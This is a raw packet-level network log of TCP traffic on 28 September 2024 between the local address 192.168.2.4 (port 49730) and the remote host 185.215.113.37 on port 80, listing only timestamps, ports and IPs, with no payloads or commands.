Sep 28, 2024 07:32:13.159775972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.159791946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.159802914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.159823895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.160223007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160281897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.160386086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160398006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160407066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160417080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160422087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160430908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160432100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.160444975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160455942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160455942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.160465956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160470963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160480976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160482883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.160490990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160501003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160501957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.160514116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160516977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.160541058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.160559893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.160815954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.160866022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.160996914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161007881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161017895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161029100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161039114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161048889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161050081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.161061049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161070108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161078930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.161079884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161091089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161099911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.161101103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161112070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161114931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.161120892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.161128044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.161159992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.244152069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244190931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244203091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244220018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.244235039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.244308949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244319916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244329929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244339943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244349957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244357109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.244374037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.244396925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.244563103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244573116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244585037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244596958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244606972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244611979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.244636059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.244767904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244779110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244788885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244798899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244810104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244818926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244829893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244841099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244851112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244860888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.244976044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.245207071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245218039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245227098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245235920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245244980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245255947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245264053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.245266914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245277882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245284081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.245289087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245292902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.245301008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245311022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245320082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245330095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245332003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.245341063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245352030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245362043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245367050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.245387077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.245404959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.245692015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245702028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245742083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.245780945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245793104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245803118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245812893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245822906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.245822906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245836020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.245841980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.245867968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246032953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246045113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246054888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246064901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246076107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246087074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246104002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246113062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246124029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246130943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246135950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246150970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246151924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246169090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246196985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246534109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246545076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246555090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246572018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246577978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246582985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246592999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246603012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246603966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246613979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246618032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246625900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246635914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246642113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246646881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246656895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246666908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246674061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246678114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246690035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246692896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246701002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246707916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246711969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246725082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246728897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246736050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246748924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.246756077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246781111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.246793985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.247417927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247427940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247438908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247448921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247458935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247467995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247473001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247477055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.247478008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247490883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247492075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.247502089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247514009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247518063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.247524977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247534037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.247534990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247545958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247555971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247560024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.247565985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.247581005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.247601986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248018980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248029947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248040915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248050928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248060942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248068094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248071909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248084068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248092890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248095989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248109102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248116016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248119116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248131037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248131990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248146057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248153925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248158932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248169899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248169899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248183966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248193026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248217106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248538017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248548031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248558044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248568058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248577118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248578072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248589039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248604059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248617887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248629093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248637915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248639107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248650074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248655081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248661995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248672962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248681068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248684883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248697042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248708010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.248723984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248723984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.248752117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.331923962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.331933975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.331944942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.331965923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.331975937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.331985950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.331995964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332026958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332078934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332110882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332122087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332133055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332143068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332165956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332185030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332369089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332379103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332392931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332402945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332413912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332415104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332423925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332429886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332434893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332462072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332485914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332672119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332681894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332691908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332701921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332716942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332720041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332727909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332737923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332746029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332746983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332758904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332767010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332771063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332786083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332786083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332798004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332799911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332811117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.332825899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.332849979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333143950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333154917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333164930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333174944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333184958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333189964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333195925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333203077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333206892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333221912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333233118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333242893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333268881 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333448887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333458900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333492041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333496094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333507061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333522081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333532095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333539009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333553076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333581924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333767891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333777905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333787918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333796978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333807945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333811998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333818913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333827972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333837986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333861113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333862066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333873034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333883047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333893061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333897114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333904982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333923101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333925009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333934069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333945036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333951950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333957911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.333976984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.333985090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.334543943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334554911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334569931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334580898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334590912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334599018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.334602118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334609985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 28, 2024 07:32:13.334616899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334626913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 28, 2024 07:32:13.334631920 CEST	49730	80	192.168.2.4	185.215.113.37
